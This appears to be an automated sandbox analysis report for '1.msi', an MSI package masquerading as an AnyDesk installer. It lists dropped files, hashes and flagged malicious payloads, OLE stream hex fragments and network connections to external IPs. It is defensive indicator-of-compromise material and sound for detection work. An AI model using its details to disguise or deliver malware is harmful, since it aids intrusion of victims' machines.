MD5: | F6D7E066F3F3BFE6E80C388A8E80530D |
SHA1: | 4113DA23B498529E7D373BB6B15C511E6215CBF0 |
SHA-256: | 6FD79F05C77A1C8CB5D73B1FEC2B16E09273E029DDC196F24115C57178C7D1EC |
SHA-512: | AB982CEEAEF2E1D690BC761C129EC387C4919BCF910513387D9D46111FDD9768F66E1CD46311FD169BD1122356DE71964590DE087B06A8BA966216EA7736E464 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 69632 |
Entropy (8bit): | 0.12990324508728232 |
Encrypted: | false |
SSDEEP: | 24:Ojd8vdOQCwY+8JfAebfddipV7sddipVlVIwGVlrkg9Syve+QG:I8virfddSBsddSH2rjeNG |
MD5: | DAEC78D92F1DF6670EB07754808C3ECC |
SHA1: | F59648041B22EC5BFE871E08EDB40278B85A5BD2 |
SHA-256: | 8DCAE1DCF7F1AA8B3F96C78805593524994AA603C611E6B9523CBCB93A774354 |
SHA-512: | FC8D121F8B877528B6E902869E931A74F88097870B8F0CD66213F9F3ACC8A431619EAD27D45DD4EE75B79CE77BB414E641FCC0A495C0B67A1FE900FB36B5183B |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\ProgramData\anydesk.exe |
File Type: | |
Category: | modified |
Size (bytes): | 10515 |
Entropy (8bit): | 4.228344603555986 |
Encrypted: | false |
SSDEEP: | 96:EtFBqt1tNtFZmKJ4FgzgFN5mj4b515wvOQ8kQVQbQWttAhDFhttFCxxv:0wPHFcKFjw9ksQNttvxV |
MD5: | C4D40B6620A5E49C215BFB0C04D9FA94 |
SHA1: | 84C02E79A8DD2CEA191AF99341F2271A6139DC48 |
SHA-256: | 1604100784E9D590149D5221F7F4318AFAE913A22EA07F6EA461F8D215EDFA25 |
SHA-512: | 06F4EE0DFFB5231F59327920110B48566C4B6FFA35FEC1113F84CE1FAE0C932ACD07F01E2AEA022FF7DDE2A5601C2391B6333E0FFCC2B4B8D7F1DC270F03E154 |
Malicious: | false |
Preview: |
Process: | C:\ProgramData\anydesk\AnyDesk.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1003 |
Entropy (8bit): | 4.272230203413794 |
Encrypted: | false |
SSDEEP: | 24:snKoXHZgCJg2cZ0FmienKoX1M61n0Q17/iMQBbSI:sn1j2genMa0CHQBbSI |
MD5: | BB28C065F16674CB7688B72C683EC985 |
SHA1: | 2D7E18B400398CDC33A387C315D434C9FFDA0CB0 |
SHA-256: | FE5DD9BE649AB519A47659B151A2607AC623179F150765C399B1EF0C7A90F82E |
SHA-512: | 6995413F415F6D708254C0BD6388B397B181B6BAF28B3D9182E50404556CBC8C38AB0CED5A2A93550DA5FBD2EDBC7945E3E2F24AD0358FBC00A3494A7040DD4E |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4063232 |
Entropy (8bit): | 7.978539254164263 |
Encrypted: | false |
SSDEEP: | 98304:pp+vXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHw:+zkTciIYUNuNCAuPH |
MD5: | 6CF5AD7A7D1B7BAB0C62E246CF41A985 |
SHA1: | B06A03ADC550EAD96534F5E723395C4E16BFDF44 |
SHA-256: | FB9F0BF2B71BF576053C56CB913EA4E93581FC9D3AA9D6D8A0AE572A1622F050 |
SHA-512: | 46CD8BD1EAD75A8ADB7D5BFF81A2FDC04567D462E965664F6F9F796237839F07F74D2201C3DA8F7F37C9DFC45749ED88708DB5A216D84F7AC146E5AF58A8608E |
Malicious: | true |
Antivirus: | |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 20480 |
Entropy (8bit): | 1.5498517775518001 |
Encrypted: | false |
SSDEEP: | 24:J7rFC/llm6cpmUHCpVluqo+QG0/rddipVlVIwGVlrkg9SCddipV7eJfAebpQCwYi:1r0pcDHoluzNG0zddSH2rbddSBerF8v |
MD5: | 14F8EB017B55B6EFBBC74E949581F9F7 |
SHA1: | E9B5537C29E22FAC2A7535C766579710CC901AC4 |
SHA-256: | 486813FA64D996C93CB8251845F093C0F26C0277ACFF9C06004DE34EB825CFBE |
SHA-512: | E9222151D1E201A06F39CBFFE9F786F968B45226DBDFEA99A0DC6746820247D23AEEB74312277BBF40B060ADDDF7734E70527CE824C55DB32A55D637012202DA |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 4063232 |
Entropy (8bit): | 7.978539254164263 |
Encrypted: | false |
SSDEEP: | 98304:pp+vXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHw:+zkTciIYUNuNCAuPH |
MD5: | 6CF5AD7A7D1B7BAB0C62E246CF41A985 |
SHA1: | B06A03ADC550EAD96534F5E723395C4E16BFDF44 |
SHA-256: | FB9F0BF2B71BF576053C56CB913EA4E93581FC9D3AA9D6D8A0AE572A1622F050 |
SHA-512: | 46CD8BD1EAD75A8ADB7D5BFF81A2FDC04567D462E965664F6F9F796237839F07F74D2201C3DA8F7F37C9DFC45749ED88708DB5A216D84F7AC146E5AF58A8608E |
Malicious: | true |
Antivirus: | |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 428024 |
Entropy (8bit): | 6.5173927188942296 |
Encrypted: | false |
SSDEEP: | 12288:stJRQ+gjpjegLyo8ktJRQ+gjpjegLyo8J:stBcpVLSktBcpVLSJ |
MD5: | 9069E5D699573FA8DE65F4D66FC36782 |
SHA1: | 3F6D828772867E2708F4491DE44C57FE3987F931 |
SHA-256: | 7F7DDF73140A3568819DE6AC422D2B42A76856FE96C2A658AF531ADB3BBD9B33 |
SHA-512: | C7614A19E126273A7464F16EF3470C4B4CE459119CBC489DE9DCDDDC5DBE2057AAAE77D551F8C26A9EB59E2FEAB373C1C565921379564EFF9ED4CE85EDF9717C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 212992 |
Entropy (8bit): | 6.513444216841171 |
Encrypted: | false |
SSDEEP: | 3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8 |
MD5: | 4CAAA03E0B59CA60A3D34674B732B702 |
SHA1: | EE80C8F4684055AC8960B9720FB108BE07E1D10C |
SHA-256: | D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D |
SHA-512: | 25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34 |
Malicious: | false |
Antivirus: | |
Joe Sandbox View: | |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 212992 |
Entropy (8bit): | 6.513444216841171 |
Encrypted: | false |
SSDEEP: | 3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8 |
MD5: | 4CAAA03E0B59CA60A3D34674B732B702 |
SHA1: | EE80C8F4684055AC8960B9720FB108BE07E1D10C |
SHA-256: | D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D |
SHA-512: | 25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34 |
Malicious: | false |
Antivirus: | |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | modified |
Size (bytes): | 212992 |
Entropy (8bit): | 6.513444216841171 |
Encrypted: | false |
SSDEEP: | 3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8 |
MD5: | 4CAAA03E0B59CA60A3D34674B732B702 |
SHA1: | EE80C8F4684055AC8960B9720FB108BE07E1D10C |
SHA-256: | D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D |
SHA-512: | 25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34 |
Malicious: | false |
Antivirus: | |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 212992 |
Entropy (8bit): | 6.513444216841171 |
Encrypted: | false |
SSDEEP: | 3072:AspAtOdmXwCGjtYNKbYO2gjpcm8rRuqpjCLw2loHUvU4yGxr53qM2a8:2tOdiRQYpgjpjew5LLyGx1qo8 |
MD5: | 4CAAA03E0B59CA60A3D34674B732B702 |
SHA1: | EE80C8F4684055AC8960B9720FB108BE07E1D10C |
SHA-256: | D01AF2B8C692DFFB04A5A04E3CCD0D0A3B2C67C8FC45A4B68C0A065B4E64CC3D |
SHA-512: | 25888848871286BDD1F9C43A0FBA35640EDB5BAFBE0C6AA2F9708A070EA4E5B16745B7C4F744AE4F5643F75EF47F196D430BF70921ED27715F712825EC590A34 |
Malicious: | false |
Antivirus: | |
Preview: |
Process: | C:\Windows\System32\msiexec.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 20480 |
Entropy (8bit): | 1.160574548383438 |
Encrypted: | false |
SSDEEP: | 12:JSbX72FjEiAGiLIlHVRpgh/7777777777777777777777777vDHFv+eGB3Jpjl0G:JqiQI5o5+eOGF |
MD5: | 80A87B6E2D6888C84B8F90246E263EE4 |
SHA1: | ACB5270E5112C472F6D91B94322A8F3C8671EFB5 |
SHA-256: | 1E86519BF9767892FC4ED05A712D90415E02B8C6B260E7556E5AF00174F0092F |
SHA-512: | F98006A315B6FAA2C939A789E36EBA40860AEA58A95B845463B8B4C66B6E5C9A4978BFF4C034EB90169516B7E1F0EA458BA6CB8E68FE65148703580219D2761B |
Malicious: | false |
Preview: |
Process: | C:\Windows\SysWOW64\expand.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 969 |
Entropy (8bit): | 4.316698873864823 |
Encrypted: | false |
SSDEEP: | 24:Y6mE76KbEE76KbE76KbEE76KbEE6mE6mE76KbEE76KbEE6r:YVE76KbEm6KbE76KbEm6KbE+EVE76KbY |
MD5: | 62DEA788F4FAC87F00521EB4D5BDE650 |
SHA1: | B1DE499D3485674F25810AD3B4EC35C2B79CE2B9 |
SHA-256: | 7B341C7ED6AECCF2058AE39B62BF891D02664BC7399ED3F8B2FE0277E8E16BAA |
SHA-512: | 0A4AA1B760AAE3BABA90ACCA55075206794F55160B4096C1B61C4C653CD3930DACAFAC46E6E37CDA488E7BFF5797C6024D33C28B163362236DBDCB1EB0D2FB0E |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 14 |
Entropy (8bit): | 3.8073549220576055 |
Encrypted: | false |
SSDEEP: | 3:i1lfoN:i1lAN |
MD5: | 2451B91DDBC6BE55D3D1FF81E7269D71 |
SHA1: | 70E56DBCB95AF007F3B08F86C0A22050991DDF02 |
SHA-256: | BF5EAAB0BE11F12556F4CEEB507DA91D8E5178BEE032C003A26070B5794774B4 |
SHA-512: | 7B08E8E00CD20D78D84A9BA2D8C8B4E7C7804BA6D1013D886FE640A70394B1484AF2658C1A94D23EC0BCAA692E8651434BAE48B20B4A895BBB9FD3A438AEAD4F |
Malicious: | false |
Preview: |
Process: | C:\Users\user\AppData\Local\Temp\MW-4a754448-1372-4b62-af77-6f1650246a5a\files\install.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3829888 |
Entropy (8bit): | 7.999053982852042 |
Encrypted: | true |
SSDEEP: | 98304:nDFWG1bqjvcLIsoh5GbmkNC3dv2tthJ2/Ev6l3H:n7svcsImkN4chYECl3 |
MD5: | 1BC5890C9E7BF54B7712E344B0AF9D04 |
SHA1: | 78C9302C7A387A8D158F38D501784BE9B8B2716D |
SHA-256: | AF61905129F377F5934B3BBF787E8D2417901858BB028F40F02200E985EE62F6 |
SHA-512: | 7113888A8439AE5AF1B260C40229F7EBB98BDECE52EBAB0CE97137933AF4E9777D92D68166DBCF87A95CF88615452CAE7ECDF555B4785FFFE63C5783DBCB595D |
Malicious: | true |
Preview: |
File type: | |
Entropy (8bit): | 7.978539254164263 |
TrID: | |
File name: | 1.msi |
File size: | 4063232 |
MD5: | 6cf5ad7a7d1b7bab0c62e246cf41a985 |
SHA1: | b06a03adc550ead96534f5e723395c4e16bfdf44 |
SHA256: | fb9f0bf2b71bf576053c56cb913ea4e93581fc9d3aa9d6d8a0ae572a1622f050 |
SHA512: | 46cd8bd1ead75a8adb7d5bff81a2fdc04567d462e965664f6f9f796237839f07f74d2201c3da8f7f37c9dfc45749ed88708db5a216d84f7ac146e5af58a8608e |
SSDEEP: | 98304:pp+vXhd7YjjTcLO6KnQh5YUNa/ckQGQCWijuYAHw:+zkTciIYUNuNCAuPH |
TLSH: | 411633603AD8C537D2DA0636092E8BAA3A657D755F21C0DB2B587CBC5E317D3AC39342 |
File Content Preview: | ........................>...................................................................................................................................................................................................................................... |
Icon Hash: | a2a0b496b2caca72 |
Document Type: | OLE |
Number of OLE Files: | 1 |
Has Summary Info: | |
Application Name: | MSI Wrapper (10.0.50.0) |
Encrypted Document: | False |
Contains Word Document Stream: | False |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | False |
Flash Objects Count: | 0 |
Contains VBA Macros: | False |
Code Page: | 1252 |
Title: | |
Subject: | |
Author: | |
Keywords: | |
Template: | |
Revision Number: | {8CB27BF3-59BC-4419-BE15-E9E385453F27} |
Create Time: | 2021-02-18 21:32:30 |
Last Saved Time: | 2021-02-18 21:32:30 |
Number of Pages: | 200 |
Number of Words: | 2 |
Creating Application: | |
Security: | 2 |
Document Code Page: | 1251 |
Company: | |
General | |
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 120 |
Entropy: | 2.826912441242884 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . H . . . . . . . . . . . ( . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . A n y d e s k . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 48 00 00 00 03 00 00 00 01 00 00 00 28 00 00 00 00 00 00 80 30 00 00 00 0f 00 00 00 38 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e3 04 00 00 13 00 00 00 19 04 00 00 1e 00 00 00 08 00 00 00 41 6e 79 64 65 73 6b 00 |
General | |
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 528 |
Entropy: | 4.752216684650982 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I n s t a l l e r . . . . . . . . . . . I n t e l ; 1 0 3 3 . . . . . . ' . . . { 8 C B 2 7 B F 3 - 5 9 B C - 4 4 1 9 - B E 1 5 - E 9 E 3 8 5 4 5 3 F 2 7 } . . @ . . . . k p = . . @ . . |
Data Raw: | fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 e0 01 00 00 0d 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 18 01 00 00 03 00 00 00 70 01 00 00 04 00 00 00 08 01 00 00 05 00 00 00 80 00 00 00 07 00 00 00 94 00 00 00 09 00 00 00 a8 00 00 00 0c 00 00 00 d8 00 00 00 0d 00 00 00 e4 00 00 00 |
General | |
Stream Path: | \x17163\x16689\x18229\x16766\x18365\x17760\x17636\x16947\x16167\x17896\x17656\x17753\x17074\x16693\x18480 |
File Type: | Microsoft Cabinet archive data, 3811024 bytes, 1 file |
Stream Size: | 3811024 |
Entropy: | 7.999935868582085 |
Base64 Encoded: | True |
Data ASCII: | M S C F . . . . & : . . . . . , . . . . . . . . . . . . . . . ~ . . H . . . v . . . . : . . . . . . . T p . i n s t a l l . e x e . . W . [ . . H . . " T # . . m . U e p . n I : . . . h < d . r ) R * + . - [ y / c 1 . x w > . " T I 1 [ ( . . . . 5 . H . . . F j . . . } } K . . O . % . o " . P j / M 2 I o t . . B / Z B k . . . . 8 . , j A r I ` r r I # ) R . . 5 ? I h . . . . . . . C L S f P $ . $ H D 4 . i q 6 . 4 . . k q . . . . . # . * . ! X . . + . C . . - p - . ' . . O d l Y E . ! . A ' . q Y % l . . |
Data Raw: | 4d 53 43 46 00 00 00 00 d0 26 3a 00 00 00 00 00 2c 00 00 00 00 00 00 00 03 01 01 00 01 00 00 00 7e ea 00 00 48 00 00 00 76 00 03 12 00 8e 3a 00 00 00 00 00 00 00 c6 54 d7 70 20 00 69 6e 73 74 61 6c 6c 2e 65 78 65 00 b8 ea a5 05 d4 57 00 80 5b 80 80 8d 04 10 48 a9 07 00 22 54 80 23 00 00 6d 00 fe b7 55 ab 65 97 99 70 b9 1b 6e c9 49 3a 09 12 9d 11 68 3c 64 19 72 29 52 cb 2a 2b 1a 2d |
General | |
Stream Path: | \x17163\x16689\x18229\x16766\x18365\x17932\x17910\x17458\x16778\x17207\x17522\x17357\x18479 |
File Type: | PE32 executable (DLL) (GUI) Intel 80386, for MS Windows |
Stream Size: | 212992 |
Entropy: | 6.513444216841171 |
Base64 Encoded: | True |
Data ASCII: | M Z . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ! . L ! T h i s p r o g r a m c a n n o t b e r u n i n D O S m o d e . . . . $ . . . . . . . . p p p p . p / p . . p q % p p . p . p R i c h p . . . . . . . . . . . . . . . . . . . . . . . . P E . . L . . . . ` . . . . . . . . . . ! . . . . . h . . . . . . . . . K . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . |
Data Raw: | 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 |
General | |
Stream Path: | \x18496\x15167\x17394\x17464\x17841 |
File Type: | data |
Stream Size: | 672 |
Entropy: | 4.764474142026 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . / . / . / . / . / . / . 5 . 5 . 5 . = . = . = . = . = . M . M . M . M . M . M . M . M . \\ . \\ . a . a . a . a . a . a . a . a . o . o . r . r . r . s . s . s . t . t . w . w . w . w . w . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 35 00 35 00 35 00 3d 00 3d 00 3d 00 3d 00 3d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 5c 00 5c 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 6f 00 6f 00 72 00 72 00 72 00 73 00 73 00 73 00 74 00 74 00 77 00 |
General | |
Stream Path: | \x18496\x16191\x17783\x17516\x15210\x17892\x18468 |
File Type: | ASCII text, with very long lines, with no line terminators |
Stream Size: | 8546 |
Entropy: | 5.082724064913251 |
Base64 Encoded: | True |
Data ASCII: | N a m e T a b l e T y p e C o l u m n _ V a l i d a t i o n V a l u e N P r o p e r t y I d _ S u m m a r y I n f o r m a t i o n D e s c r i p t i o n S e t C a t e g o r y K e y C o l u m n M a x V a l u e N u l l a b l e K e y T a b l e M i n V a l u e I d e n t i f i e r N a m e o f t a b l e N a m e o f c o l u m n Y ; N W h e t h e r t h e c o l u m n i s n u l l a b l e Y M i n i m u m v a l u e a l l o w e d M a x i m u m v a l u e a l l o w e d F o r f o r e i g n k e y |
Data Raw: | 4e 61 6d 65 54 61 62 6c 65 54 79 70 65 43 6f 6c 75 6d 6e 5f 56 61 6c 69 64 61 74 69 6f 6e 56 61 6c 75 65 4e 50 72 6f 70 65 72 74 79 49 64 5f 53 75 6d 6d 61 72 79 49 6e 66 6f 72 6d 61 74 69 6f 6e 44 65 73 63 72 69 70 74 69 6f 6e 53 65 74 43 61 74 65 67 6f 72 79 4b 65 79 43 6f 6c 75 6d 6e 4d 61 78 56 61 6c 75 65 4e 75 6c 6c 61 62 6c 65 4b 65 79 54 61 62 6c 65 4d 69 6e 56 61 6c 75 65 |
General | |
Stream Path: | \x18496\x16191\x17783\x17516\x15978\x17586\x18479 |
File Type: | data |
Stream Size: | 1216 |
Entropy: | 3.1068972075441508 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . . . . . . . . . 6 . . . $ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . B . . . . . . . . . . . . . . o . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . ; . . . . . . . . . . . > . . . . . . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . S . . . ^ . . . . . . . . |
Data Raw: | 00 00 00 00 04 00 06 00 05 00 02 00 00 00 00 00 04 00 02 00 06 00 02 00 0b 00 15 00 05 00 05 00 01 00 2c 00 0a 00 01 00 13 00 02 00 0b 00 06 00 03 00 02 00 08 00 02 00 09 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 08 00 02 00 0a 00 19 00 0d 00 01 00 0e 00 01 00 03 00 01 00 1e 00 01 00 01 00 2a 00 15 00 01 00 15 00 01 00 36 00 01 00 24 00 01 00 f5 00 01 00 0f 00 01 00 04 00 09 00 |
General | |
Stream Path: | \x18496\x16255\x16740\x16943\x18486 |
File Type: | data |
Stream Size: | 38 |
Entropy: | 3.123963756721792 |
Base64 Encoded: | False |
Data ASCII: | . . " . ) . * . + . / . 5 . = . M . \\ . a . o . r . s . t . w . . . . |
Data Raw: | 06 00 22 00 29 00 2a 00 2b 00 2f 00 35 00 3d 00 4d 00 5c 00 61 00 6f 00 72 00 73 00 74 00 77 00 82 00 86 00 90 00 |
General | |
Stream Path: | \x18496\x16383\x17380\x16876\x17892\x17580\x18481 |
File Type: | data |
Stream Size: | 2064 |
Entropy: | 2.381269221109181 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . " . " . " . ) . ) . ) . * . * . * . + . + . / . / . / . / . / . / . 5 . 5 . 5 . = . = . = . = . = . M . M . M . M . M . M . M . M . \\ . \\ . a . a . a . a . a . a . a . a . o . o . r . r . r . s . s . s . t . t . w . w . w . w . w . w . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . % . ' . # . % . ' . # . % . ' . . . - . % . / . 1 . 4 . 7 . : . 5 . I . K . . . # . @ . C . F . . . 4 . 7 . M . O . Q . T . V . ] . _ . ' . 7 . _ |
Data Raw: | 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 06 00 0a 00 0a 00 22 00 22 00 22 00 29 00 29 00 29 00 2a 00 2a 00 2a 00 2b 00 2b 00 2f 00 2f 00 2f 00 2f 00 2f 00 2f 00 35 00 35 00 35 00 3d 00 3d 00 3d 00 3d 00 3d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 4d 00 5c 00 5c 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 61 00 6f 00 6f 00 72 00 72 00 72 00 73 00 73 00 73 00 74 00 |
General | |
Stream Path: | \x18496\x16661\x17528\x17126\x17548\x16881\x17900\x17580\x18481 |
File Type: | data |
Stream Size: | 4 |
Entropy: | 1.5 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x16842\x17200\x15281\x16955\x17958\x16951\x16924\x17972\x17512\x16934 |
File Type: | data |
Stream Size: | 48 |
Entropy: | 3.0684210940655055 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x16842\x17200\x16305\x16146\x17704\x16952\x16817\x18472 |
File Type: | data |
Stream Size: | 24 |
Entropy: | 2.594360937770434 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x16842\x17913\x18126\x16808\x17912\x16168\x17704\x16952\x16817\x18472 |
File Type: | data |
Stream Size: | 42 |
Entropy: | 2.9135675273020816 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x16911\x17892\x17784\x15144\x17458\x17587\x16945\x17905\x18486 |
File Type: | data |
Stream Size: | 4 |
Entropy: | 1.5 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x16911\x17892\x17784\x18472 |
File Type: | 386 compact demand paged pure executable |
Stream Size: | 16 |
Entropy: | 1.9197367178034825 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x16918\x17191\x18468 |
File Type: | MIPSEB Ucode |
Stream Size: | 14 |
Entropy: | 0.946372935985442 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x16923\x17194\x17910\x18229 |
File Type: | data |
Stream Size: | 60 |
Entropy: | 3.5292412679834797 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x17163\x16689\x18229 |
File Type: | data |
Stream Size: | 8 |
Entropy: | 1.75 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x17165\x16949\x17894\x17778\x18492 |
File Type: | data |
Stream Size: | 18 |
Entropy: | 2.102187170949333 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x17490\x17910\x17380\x15279\x16955\x17958\x16951\x16924\x17972\x17512\x16934 |
File Type: | data |
Stream Size: | 216 |
Entropy: | 4.294855551942891 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x17490\x17910\x17380\x16303\x16146\x17704\x16952\x16817\x18472 |
File Type: | data |
Stream Size: | 48 |
Entropy: | 3.110087760732172 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x17548\x17648\x17522\x17512\x18487 |
File Type: | Dyalog APL aplcore version 171.0 |
Stream Size: | 12 |
Entropy: | 2.292481250360578 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x17630\x17770\x16868\x18472 |
File Type: | data |
Stream Size: | 32 |
Entropy: | 2.198391110799899 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x17753\x17650\x17768\x18231 |
File Type: | data |
Stream Size: | 88 |
Entropy: | 3.9470457308545095 |
Base64 Encoded: | False |
General | |
Stream Path: | \x18496\x17932\x17910\x17458\x16778\x17207\x17522 |
File Type: | data |
Stream Size: | 180 |
Entropy: | 2.754589929626484 |
Base64 Encoded: | False |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Aug 5, 2022 18:23:17.955034971 CEST | 49175 | 443 | 192.168.2.22 | 195.181.174.167 |
Aug 5, 2022 18:23:17.955077887 CEST | 443 | 49175 | 195.181.174.167 | 192.168.2.22 |
Aug 5, 2022 18:23:17.955163002 CEST | 49175 | 443 | 192.168.2.22 | 195.181.174.167 |
Aug 5, 2022 18:23:17.956656933 CEST | 49175 | 443 | 192.168.2.22 | 195.181.174.167 |
Aug 5, 2022 18:23:17.956707001 CEST | 443 | 49175 | 195.181.174.167 | 192.168.2.22 |
Aug 5, 2022 18:23:17.956804037 CEST | 49175 | 443 | 192.168.2.22 | 195.181.174.167 |
Aug 5, 2022 18:23:18.078598976 CEST | 49176 | 80 | 192.168.2.22 | 92.223.88.41 |
Aug 5, 2022 18:23:18.109005928 CEST | 80 | 49176 | 92.223.88.41 | 192.168.2.22 |
